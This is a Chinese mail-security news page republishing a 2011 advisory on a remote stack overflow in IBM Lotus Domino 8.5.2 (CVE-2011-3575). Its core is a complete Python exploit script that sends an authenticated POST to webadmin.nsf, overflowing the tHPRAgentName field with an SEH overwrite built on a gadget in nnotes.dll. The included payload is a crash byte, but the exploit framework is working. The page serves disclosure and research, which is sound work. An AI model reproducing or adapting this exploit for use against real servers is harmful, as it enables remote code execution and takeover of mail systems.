首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

邮件网络安全

系统安全 | 邮件软件漏洞 | 攻防技术 | 安全基础 | 病毒公告 | 病毒查杀 | Forefront/TMG/ISA | 防火墙 | 数字签名 |
首页 > 邮件网络安全 > 邮件软件漏洞 > IBM Lotus Domino "NSFComputeEvaluateExt()"函数远程栈缓冲区溢出漏洞 > 正文

IBM Lotus Domino "NSFComputeEvaluateExt()"函数远程栈缓冲区溢出漏洞

出处:绿盟科技 作者:绿盟科技 时间:2011-9-29 17:34:42
发布日期:2011-09-21
更新日期:2011-09-21

受影响系统:
IBM Lotus Domino 8.5.2
描述:
BUGTRAQ  ID: 49705
CVE ID: CVE-2011-3575

Lotus Domino是集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台。

IBM Lotus Domino在"NSFComputeEvaluateExt()"函数的实现上存在远程栈缓冲区溢出漏洞,远程攻击者可利用此漏洞以系统级别的权限执行任意代码,完全控制受影响计算机。

WebAdmin.nsf模块没有进行正确的边界检查。通过发送特制的HTTP POST请求,远程已验证攻击者可以系统级别的权限造成缓冲区溢出和执行任意代码。

<*来源:rmallof
  
  链接:http://www.research.reversingcode.com/index.php/advisories/73-ibm-ssd-1012211
        http://xforce.iss.net/xforce/xfdb/69802
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python

import socket,struct,sys,os

host="192.168.x.y"                    #server ip here!
cookie="1234567890abcdef"                            #Set your Cookie credential here! Cookie = base64((usr:pwd))
#Shellcode = Using XOR [reg],reg to crash ("like" INT3 :))
Shellcode=chr(0x30)

server=host,80
SEH=struct.pack("<L",0x60404672)                       # POP ESI - POP EBP - RETN nnotes.dll.60404672
nSEH=struct.pack("<L",0x4141347A)                      # INC ecx  ;NOP 
                                                        # INC ecx  ;NOP
                            # JPE  slep ;Detour
vars="__Click=0&tHPRAgentName="                         #tHPRAgentName => Vulnerable POST variable
buf="A"*436                                             #sended buffer-nSEH-SEH
slep="X"*46                                             #pre-shellcode to fix JPE landing

#This function forges our POST request (with our Shellcode sure)
def buildPOST(h,b,c):                
    P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
    P+="Host: "+h+"\r\n"
    P+="User-Agent: oh sure\r\n"
    P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    P+="Accept-Language: chinnese plz\r\n"
    P+="Accept-Encoding: gzip,deflate\r\n"
    P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    P+="Keep-Alive: 115\r\n"
    P+="Connection: keep-alive\r\n"
    P+="Referer:  http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
    P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
    P+="Authorization: Basic "+c+"\r\n"
    P+="Content-Type: application/x-www-form-urlencoded\r\n"
    P+="Content-Length: %s\r\n" % str(len(b))
    P+="\r\n"
    P+=b
    return P

def main():
    if os.name=="nt":
        os.system("cls")
    else:
        os.system("clear")
    print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
    print"\t        ->[Remote Code Execution Exploit]<-\n\n"
    print"[+] Crafting buffer..."
    #Creating POST content data
    buffer=vars+buf+nSEH+SEH+slep+Shellcode
    print"[+] Connecting to server..."
    s=socket.socket()
    #Trying connect to IBM Lotus Domino HTTP server
    try:
        s.connect(server)
    #We goin to exit if this fails
    except:
        print"[-] Error connecting to remote server..."
        sys.exit(0)
    print"[+] Crafting POST request..."
    #Crafting final POST
    post=buildPOST(host,buffer,cookie)
    print"[+] 0k, sending..."
    #Sending Shellcode to remote server
    s.send(post)
    #Server is running? Some fails :S
    try:
        print s.recv(2048)
        print"[x] Exploit failed!"
    #Else we achieve remote code execution successfully
    except:
        print"[+] Done!" 
    s.close()
    print"\n[*] By @rmallof"

if __name__=="__main__":
    main()

建议:
厂商补丁:

IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ers.ibm.com/
相关文章 热门文章
  • Mozilla Firefox/Thunderbird/SeaMonkey Enter Key对话框绕过漏洞
  • Novell GroupWise Internet Agent Weekly Calendar Recurrence变量解析远程代码执行漏洞
  • Novell GroupWise Internet Agent Yearly RRULE变量远程代码执行漏洞
  • Novell GroupWise 8 Internet Agent TZNAME (VCALENDAR)变量解析远程代码执行漏洞
  • Novell GroupWise 8 "Directory.Item"参数跨站脚本执行漏洞
  • GroupWise Internet Agent (GWIA)拒绝服务漏洞
  • Google+再出漏洞 用户重复收到垃圾邮件
  • SquirrelMail多个HTML注入、跨站脚本执行和安全限制绕过漏洞
  • BlackBerry Enterprise Server BlackBerry Administration API文件泄露漏洞
  • Microsoft Lync Server 2010 "ReachJoin.aspx"远程命令注入漏洞
  • IBM Lotus Notes附件处理多个缓冲区溢出漏洞
  • MDaemon Server WorldClient邮件主题HTML注入漏洞
  • Exchange Server 2003 中的弱点会导致权限提升
  • 更安全稳定!快下载微软ISA 2000 SP2
  • MDaemon 7.2发现权限提升漏洞
  • Exchange 2003 Server发布新补丁KB883543
  • 微软发布关于Exchange漏洞紧急公告
  • MS05-021:Exchange Server漏洞远程执行代码
  • WebAdmin 3.0.2 跨站脚本、HTML注入安全漏洞
  • Imail Server IMAP EXAMINE命令缓冲区溢出漏洞
  • Open WebMail Email存在头字段HTML代码注入漏洞
  • 微软发布关于Exchange 5.5 漏洞更新公告
  • IMail 8.13远程DELETE命令缓冲区溢出漏洞
  • MS04-035:SMTP中安全漏洞可能允许执行远程代码
  • 自由广告区
     
    最新软件下载
  • win2003 exchange2003 迁移到win2008r...
  • exchange 2003迁移到exchange 2010图文..
  • Exchange 2003 迁移至Exchange 2010 完..
  • Acronis Disk Director 10
  • Paragon Partition Manager 7.0汉化版
  • Password Expiration Notifier 2.0
  • Exchange Server 2003/7升级到Exchang...
  • Exchange Server 2010安全性-防垃圾邮...
  • Exchange Server 2010信息归档和保留&...
  • Exchange Server 2010信息保护和控制
  • Exchange Server 2010的高可用性-DAG(...
  • Exchange Server 2010的高可用性-DAG(...
  • 今日邮件技术文章
  • Mozilla Firefox/Thunderbird/SeaMonk...
  • Novell GroupWise Internet Agent Wee...
  • Novell GroupWise Internet Agent Yea...
  • Novell GroupWise 8 Internet Agent T...
  • Novell GroupWise 8 "Directory.Item"...
  • GroupWise Internet Agent (GWIA)拒绝...
  • IBM Lotus Domino "NSFComputeEvaluat...
  • 化零为整 263企业即时通讯成百货企业得..
  • 263EM助出口企业减少美欧债务危机影响
  • 263EM金秋给力促销 有礼更有利
  • 租用邮箱or自建邮件系统,如何选择?
  • 基于windows cluster构建Exchange2003...
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号